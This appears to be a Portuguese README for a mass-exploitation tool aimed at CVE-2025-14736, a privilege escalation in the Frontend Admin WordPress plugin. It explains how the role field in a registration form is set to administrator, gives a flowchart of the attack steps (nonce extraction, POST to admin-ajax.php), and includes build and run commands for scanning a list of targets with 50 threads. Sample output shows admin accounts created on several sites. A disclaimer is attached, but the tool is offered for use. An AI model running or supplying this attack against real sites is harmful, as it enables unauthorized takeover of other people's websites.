
Escalação de privilégios não autenticada para Administrador via campo de formulário de função
Autor: Hyun Chiya
| Campo | Valor |
|---|---|
| ID CVE | CVE-2025-14736 |
| Plugin | Frontend Admin by DynamiApps |
| Versões Afetadas | <= 3.28.25 |
| Tipo de Vulnerabilidade | Escalação de Privilégios Não Autenticada |
| Severidade | Crítica |
O plugin Frontend Admin para WordPress é vulnerável a escalação de privilégios não autenticada devido à validação insuficiente em campos controlados pelo usuário durante o registro. Atacantes podem injetar funções arbitrárias, incluindo administrator, manipulando o payload de envio do formulário.
A lógica vulnerável reside no tratamento de envios de formulários onde o campo role é confiado à entrada do usuário sem verificar se o usuário está autorizado a atribuir essa função. Especificamente, o campo acff[user][field_user_role_ID] pode ser modificado para administrator.
flowchart TD
A["Attacker visits Registration Page"] --> B["Extract Nonce (_acf_nonce) & Form ID (_acf_form)"]
B --> C["Construct POST payload with 'role'='administrator'"]
C --> D["POST to /wp-admin/admin-ajax.php"]
D --> E{"Verification"}
E -->|Success| F["New Admin User Created"]
style F fill:#ff6b6b,stroke:#c92a2a,color:#fffgo build -o mass_exploit.exe mass_exploit.go
.\mass_exploit.exe -l list.txt -t 50
| Argumento | Descrição |
|---|---|
-l | Caminho para a lista de URLs alvo (padrão: list.txt) |
-t | Número de threads concorrentes (padrão: 10) |
-timeout | Tempo limite de requisição em segundos (padrão: 15) |
>> [ ONLINE ]
╔═══════════════════════════════════════════════════════════════════════════════════════╗
║ CVE-2025-14736 - Mass Exploit Tool ║
║ Frontend Admin by DynamiApps Privilege Escalation ║
║ Author: Hyun Chiya ║
╚═══════════════════════════════════════════════════════════════════════════════════════╝
>> [ INFORMATION ]
[*] Loaded 500 targets. Starting scan with 50 threads...
[SUCCESS] http://target.com | User: hacker_mass | Pass: Password123! | FormID: 48
[SUCCESS] http://example.org | User: hacker_mass | Pass: Password123! | FormID: 32
[*] Scan complete.
Esta ferramenta é fornecida apenas para fins educacionais e de testes de segurança autorizados. O acesso não autorizado a sistemas de computador é ilegal. Use com responsabilidade.
Hyun Chiya